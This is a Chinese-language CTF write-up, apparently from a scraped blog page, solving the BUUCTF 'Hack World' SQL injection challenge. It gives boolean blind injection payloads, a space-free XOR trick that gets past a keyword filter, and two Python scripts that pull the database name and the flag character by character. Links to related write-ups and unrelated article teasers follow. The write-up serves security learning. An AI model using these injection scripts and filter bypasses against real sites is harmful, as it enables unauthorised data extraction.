id=0

id=1

id=2

id=3





发现结果不一样,尝试 : ">4","=4","<4" : 




在自己的环境下验证一下:




爆一下数据库:




id=(ascii(substr(database(),1,1))>32)








'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,129):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"(ascii(substr(database(),%d,1))=%d)" %(i,j)}

             # data={"id":"(ascii(substr((select flag from flag),%d,1))=%d)" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








过滤如何处理:


在爆flag的时候发现有过滤 :select,show,""……很是难受,后来在师傅的博客上看到了这种方法:




id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))






1^1=0 ,0^0=0 ,0^1=1


1^1^1=1, 1^1^0=0
构造payload:1^ascii(mid(database(),1,1)=98)^0


注意这里会多加一个^0或1是因为在盲注的时候可能出现了语法错误也无法判断,而改变这里的0或1,如果返回的结果是不同的,那就可以证明语法是没有问题的


其实不用抑或也行:




id=(ascii(substr((select(flag)from(flag)),1,1))<128)






居然去掉空格就成功绕过了Orz,这个方法要学习一下,这里贴一下我的脚本,没有用二分十分简单的枚举:




'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,1290):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             # print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








参考资料:


SQL注入学习总结(八):其他SQL注入的异或注入:https://blog.csdn.net/weixin_30740295/article/details/96833688




buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World:https://blog.csdn.net/weixin_43345082/article/details/99062970


												


											
BUUCTF | [CISCN2019 华北赛区 Day2 Web1]Hack World的更多相关文章
	

    
								
  1. 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    目录 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World 一.前言 二.正文 1.解题过程 2.解题方法 刷题记录:[CISCN2019 华北赛区 Day2 Web1] ...
    
		
    2. 
						
  2. [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    知识点:题目已经告知列名和表明为flag,接下来利用ascii和substr函数即可进行bool盲注 eg: id=(ascii(substr((select(flag)from(flag)),1,1 ...
    
		
    3. 
						
  3. BUUOJ [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    补一下这道题,顺便发篇博客 不知道今年国赛是什么时候,菜鸡还是来刷刷题好了 0X01 考点 SQL注入.盲注.数字型 0X02自己尝试 尝试输入1 赵师傅需要女朋友吗???随便都能有好吧 输入2 ?? ...
    
		
    4. 
						
  4. 刷题[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    解题思路 打开发现是很简单的页面,告诉了表名和列名,只需知道字段即可 尝试一下,输入1,2都有内容,后面无内容.输入1'让他报错,发现返回bool(false) 大概思路就是布尔型注入了,通过不断返回 ...
    
		
    5. 
						
  5. [CISCN2019 华北赛区 Day2 Web1]Hack World 1详解
		
    打开题目, 我们开始尝试注入, 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do ...
    
		
    6. 
						
  6. [CISCN2019 华北赛区 Day2 Web1]Hack World(二分法写布尔注入脚本)
		
    记一道布尔注入的题,存在过滤字符. 从题目看应该是一道注入题.提示存在flag表flag列. 输入1和2的返回结果不一样,可能是布尔注入. 简单用万能密码尝试了一下.提示SQL Injection C ...
    
		
    7. 
						
  7. BUUCTF | [CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    步骤: 1.运行这个: <?php class User { public $db; } class File { public $filename; } class FileList { pr ...
    
		
    8. 
						
  8. 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    目录 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox 一.涉及知识点 1.任意文件下载 2.PHAR反序列化RCE 二.解题方法 刷题记录:[CISCN2019 华北赛区 ...
    
		
    9. 
						
  9. PHAR伪协议&&[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    PHAR:// PHP文件操作允许使用各种URL协议去访问文件路径:如data://,php://,等等 include('php://filter/read=convert.base64-encod ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. vue-过滤器(filter)
			
    1.全局过滤器(项目中所有的vue文件都可以使用) 1.1  直接注册全局过滤器 在main.js中注册: 在项目中使用; 前面的为时间,作为filter过滤器的第一个参数. 1.2 所有过滤器写在一 ...
    
			
    2. 
						
  2. 安卓中如何调用jni
			
    ##指针和数组之间的关系 * 数组名就是数组元素的首地址 * 数组是一块连续的内存空间,每个元素之间的距离跟数据的类型有关 * 数组名字取地址,得到的还是数组的首地址 * arr[i]  ==  *( ...
    
			
    3. 
						
  3. 【ABAP系列】SAP ABAP 如何控制Dialog中的键盘(回车)功能
			
    公众号:SAP Technical 本文作者:matinal 原文出处:http://www.cnblogs.com/SAPmatinal/ 原文链接:[ABAP系列]SAP ABAP 如何控制Dia ...
    
			
    4. 
						
  4. LeetCode 144. Binary Tree Preorder Traversal 动态演示
			
    先序遍历的非递归办法,还是要用到一个stack class Solution { public: vector<int> preorderTraversal(TreeNode* root) ...
    
			
    5. 
						
  5. java 工厂模式 从无到有-到简单工厂模式-到工厂方法模式-抽象工厂模式
			
    工厂模式定义(百度百科): 工厂模式是我们最常用的实例化对象模式了,是用工厂方法代替new操作的一种模式.著名的Jive论坛 ,就大量使用了工厂模式,工厂模式在Java程序系统可以说是随处可见.因为工 ...
    
			
    6. 
						
  6. python的运算符和while循环
			
    一.运算符 计算机可以进行的运算有很多种,不只是加减乘除,它和我们人脑一样,也可以做很多运算. 种类:算术运算,比较运算,逻辑运算,赋值运算,成员运算,身份运算,位运算,今天我们先了解前四个. 算术运 ...
    
			
    7. 
						
  7. MySQL-第五篇视图
			
    1.视图看上去像是表,但它又不是,它并不能存储数据.视图只是一个或者多个表的逻辑显示.使用视图的好处: 1>可以限制对数据的访问 2>可以使复杂的查询变得简单 3>提供了数据的独立性 ...
    
			
    8. 
						
  8. kmp(最长前缀与后缀)
			
    http://acm.hdu.edu.cn/showproblem.php?pid=1358 Period Problem Description For each prefix of a given ...
    
			
    9. 
						
  9. [Codeforces 1178D]Prime Graph (思维+数学)
			
    Codeforces 1178D (思维+数学) 题面 给出正整数n(不一定是质数),构造一个边数为质数的无向连通图(无自环重边),且图的每个节点的度数为质数 分析 我们先构造一个环,每个点的度数都是 ...
    
			
    10. 
						
  10. python依赖包整体迁移方法(pip)
			
    做个记录 python依赖包整体迁移方法
    
			
    11.